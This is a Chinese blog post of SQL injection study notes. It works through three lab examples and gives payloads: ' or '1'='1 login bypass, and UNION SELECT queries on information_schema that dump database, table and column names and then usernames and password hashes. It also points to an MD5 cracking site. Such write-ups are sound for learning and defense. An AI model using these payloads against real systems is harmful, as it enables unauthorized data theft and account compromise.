网络安全之SQL注入漏洞复现(上篇)(技术进阶)

已于 2024-04-20 13:58:51 修改
阅读量1.8k 收藏 19
点赞数 42
文章标签: 安全 web安全 网络
于 2024-04-12 22:28:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70911257/article/details/137650290
版权

目录

一,认识SQL注入

二,SQL注入会导致什么呢?

三,SQL注入思想与步骤

四,实战演练

【1】实例1:

【2】实例2:

【3】实例3:

一,认识SQL注入

SQL注入(SQL Injection)是一种常见的网络攻击手段,是因为应用程序对用户输入的数据验证不到位造成的。攻击者在应用程序的输入字段中插入恶意的SQL代码,在应用程序未授权的情况下执行任意的SQL语句。

二,SQL注入会导致什么呢?

1,数据泄露:我们的账号密码,个人身份信息的等等

2,数据篡改:篡改商品的价格,学生成绩等等

3,数据删除:删除某些数据

4,拒绝服务攻击(DoS):利用SQL注入制作大量查询和复杂的操作导致系统资源耗尽

5,提权攻击:利用SQL注入提升权限执行系统命令等

6,绕过身份验证:利用SQL注入绕过身份验证使得攻击者管理员特权身份

三,SQL注入思想与步骤

1,找到注入点

2,获取对方数据库名字

3,获取对方数据库中有那些表

4,获取表中有哪些字段

5,获取字段表中的数据

四,实战演练

【1】实例1:

1,找到注入点

登录后发现注入点

可以得知账号和密码都可以注入

2,这里可以通过闭合sql语句在url地址栏注入语句

sql注入代码:

' or  '1'='1

所以就得到了

这条语句的意思是不管账号密码对不对后面多了个 or '1'='1'这条语句条件为真,所以把user表给查询出来,得到数据。

【2】实例2:

1,找到注入点

2,老样子闭合注入

sql注入代码:

' or '1'='1

得到news表中数据

3,获取数据库的名字

使用union注入

首先使用union之前来了解一下什么是union和注意的事项

【1】union用于合并两个或多个select语句的结果

【2】使用union两个select的列的数量和数据类型一定要相同

例如:

user表:

user2表:

如果列数不相同会出现如下的错误:

我们这个实例中获取数据库名字可以用:

select *from user date='注入点' 
union
select database(),'','',' //这里对应user列的数量

这里浅谈一下information_schema数据库吧!下面用的到

【1】information_schema是mysql中的一个特殊的数据库它里面包含了许多的表例如:

1,TABLES:里面包含了所有的数据库名和表名。

2,COLUMNS:里面包含了所有的数据库名、表名、字段名。

3,SCHEMATA:里面包含了所有的数据库名。

4,获取game数据库中有那些表

那么如何注入呢?

【1】这个代码的意思是从information_schema数据库中的TABLES表中筛选出game数据库中的表名。

【2】又因为要与news的列对齐,所以要将table_name改为group_concat(table_name),

group_concat()的作用是将多行数据合并为一行。

【3】在url地址栏中的date=后面接上:

' union  select (select group_concat(table_name) from information_schema.`TABLES` where  table_schema='game') ,'','','

得到game数据库中的表名

5,获取game数据库中user表中有那些字段

【1】执行语句

select
	COLUMN_name 
from
	information_schema.`COLUMNS` 
where
	table_schema = 'game' 
	and table_name = 'user'

这段代码的意思是:从information_schema数据库中的COLUMNS表里面去找数据库名字是game并且表名是user的字段

得到结果:

【2】又因为要与news的列对齐,所以要将column_name改为group_concat(column_name)

group_concat()的作用是将多行数据合并为一行。

【3】在url地址栏中的date=后面接上:

' union select (group_concat(COLUMN_name)  from  information_schema.`COLUMNS`  where   table_schema = 'game'    and table_name = 'user'),'','','

得到game数据库中user表中的字段

6,拿到字段后看里面有那些数据

【1】在url地址栏中的date=后面接上:

' union select (select group_concat(username) from user where '1'='1'),'','','

【2】在url地址栏中的date=后面接上:

' union select (select group_concat(password) from user where '1'='1'),'','','

【3】实例3:

1,点击进入找注入点

2,通过下面的数据可以猜到sql语句大概是:select *from 表名 where 字段=?

3,我咋知道它是注入点的呢?

【1】这里数据库对“狗蛋”进行了查询,因为我们的表中没有“狗蛋”所以返回了那串英文,所以说明这里是一个注入点

4,判断这个表中有几列(多少个字段)

【1】通过order by来判断

【2】order by是排序语句。

例如:order by 4

这里它基于列进行排序,这里是5时它就报错了,在4时没有报错,由此可以得出结论这个表有4列。

5,使用union找注入点(union联合两个select语句输出结果,上面提到了忘记了可以去看看)

【1】url地址栏中使用:

id=3 union select 1,2,3,4

【2】通过找到的注入点获取数据库的名字和版本

sql注入代码:

id=3 union select 1,database(),'',version()


 

【3】如何知道对方都有那些数据库呢?

sql注入代码:

id=3 select  union  select 1,2,3,(select group_concat(schema_name) from information_schema.schemata)

 【4】查询数据库中有那些表

sql注入代码:

id=3 union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema='jrlt')

【5】查询表中有那些字段

sql注入代码

id=3 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema='jrlt' and table_name='users'

【6】通过字段拿到里面的数据

sql注入代码:

id=3 union select 1, 2,3,name from users

sql注入代码:

id=3 union select 1, 2,3,password from users

复制去解密网站去解码:md5在线解密破解,md5解密加密 (cmd5.com)

以上就是我的学习笔记了,谢谢观看!!

戰、天下
关注
网络安全初探SQL注入漏洞
07-02
网络安全领域,SQL注入漏洞是一种常见的安全威胁,尤其在基于Web的应用程序中。本文将深入探讨SQL注入漏洞的原理、危害、以及如何防范这一问题。 SQL(Structured Query Language)是用于管理和处理关系数据库的...
sql注入漏洞复现
yfy0308的博客
08-06 674
id=-1’ uninon select 1,2,3 第一件事,闭合单引号,摆脱单引号控制id=-1’是原因:有时网页往往只能一行数据,所以我们要让前面第一个select语句的返回值为空,才能让后面的第二个select语句回显出数据。2个办法,继续把多出来的单引号闭合或者注释mysql注释符:–空格(%20) # /***/ */ #会被浏览器编码,所以要写成%23你需要知道联合查询的列数,求当前表的列数(我们用注入获取数据库中的数据。在进行联合查询前,我们必须知道当前表的字段数。
实验吧---简单的sql注入
mengtongxch的博客
10-19 551
通过注入获得flag值(提交格式:flag{})。 解题链接: http://ctf5.shiyanbar.com/423/web/ 首先呢点击这个链接,出现以下界面 当我们在框里面输入1,2,3的时候会出现一些东西,例如 用sqlmap扫描一下爆出其数据库,数据表,字段 参考网址:https://www.cnblogs.com/baifan261...
SQL注入、XSS与CSRF漏洞复现及分析
Kali与编程
04-14 440
总结起来,SQL注入、XSS和CSRF都是常见且危害严重的Web漏洞。理解这些漏洞复现方法和原理有助于我们更好地制定针对性的安全策略,并通过实施有效的防御措施来保护Web应用不受此类攻击的侵害。攻击者可以在自己的网站上创建类似的表单,诱使用户在其不知情的情况下触发此表单提交,完成转账。当其他用户浏览包含此评论的页面时,会弹出警告框,表明存在XSS漏洞SQL注入、XSS与CSRF漏洞复现及分析。二、跨站脚本攻击(XSS)漏洞复现与分析。一、SQL注入漏洞复现与分析。
SQL注入漏洞复现(CVE-2017-8917)
m0_56578216的博客
08-30 745
前提条件:1.Docker Compose是 docker 提供的一个命令行工具,用来定义和运行由多个容器组成的应用,而docker-compose.yml是它的配置文件。
sql注入复现(1-14关)
最新发布
weixin_65785894的博客
08-06 1162
判断注入是否存在判断sql语句是否拼接可以根据结果指定是字符型且存在。因为该页面存在回显,所以我们可以使用联合查询。联合注入爆列首先知道表格有几列,如果报错就是超出列数,显示正常则是没有超出列数(使用二分法,先查看一个大的数值,显示正常,则翻倍,报错则缩小一半数值)爆显示位由于我们已经知道了这个表有三列,所以我们使用联合查询来爆出显示位由于只能查看一组数据,所以我们需要修改id值,让他要么远超这个数据表,要么小于0爆数据库名和版本号。
SQL 注入攻击介绍
代码星辰的博客
03-12 4870
SQL 注入攻击介绍
网络安全威胁——SQL注入攻击
聚集机器学习、信息安全
04-04 9911
随着互联网的发展和普及,网络安全问题越来越突出。SQL注入(SQL Injection)攻击是其中最普遍的安全隐患之一,它利用应用程序对用户输入数据的信任,将恶意SQL代码注入到应用程序中,导致敏感信息泄露、数据损坏或删除及系统瘫痪,给企业和个人带来巨大损失。
2020-10-10
不二的博客
10-10 995
一:什么是sql注入   SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 二:SQL注入攻击的总体思路    1:寻找到SQL注入的位置   2:判断服务器类型和后台数据库类型   3:针对不同的服务器和数据库特点进行SQL注入攻击 三:SQL注入攻击实例 String sql = "select * from user_table where username= ' "+us..
漏洞复现】熊海cms 存在sql注入 附poc
失心少年
11-26 1269
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发;熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
SQL注入攻击
weixin_55010563的博客
08-26 1174
SQL注入是一种常见的安全漏洞,当未经验证或过滤的用户输入直接拼接到SQL查询语句中时,攻击者可以利用这个漏洞执行恶意操作。SQL注入攻击可以导致身份验证绕过、数据泄露、数据库破坏等严重后果。为了防止SQL注入攻击,可以采用参数化查询或预编译语句的方法。参数化查询通过将用户输入作为查询的参数,而不是直接拼接到查询语句中,从而保证了输入的安全性。预编译语句则是在执行查询之前预先编译查询语句,并通过绑定参数的方式安全地插入用户输入。这两种方法都能有效地防止SQL注入攻击,提高应用程序的安全性。开发人员应该
SQL注入漏洞全接触.ppt
11-15
* SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到的资料。 二、 SQL注入漏洞的...
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
php168sql注入漏洞
08-15
它支持多种数据库类型,功能强大,可以帮助安全研究人员和渗透测试人员快速验证并利用SQL注入漏洞。 - **具体命令**: - `sqlmap.py -u ...
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1499
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
网络安全SQL注入_sql注入攻击实例(必学系列)
weixin_57514792的博客
03-13 2497
网络安全-SQL注入
SQL注入式攻击
gaofangxw的博客
06-13 1844
加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了"消毒"处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。(4)用户输入的内容提交给服务器之后,服务器运行上面的ASP.NET代码构造出查询用户的SQL命令,但由于攻击者输入的内容非常特殊,所以最后得到的SQL命令变成:SELECT * from Users WHERE login = '' or '1'='1' AND password = '' or '1'='1'。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戰、天下

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值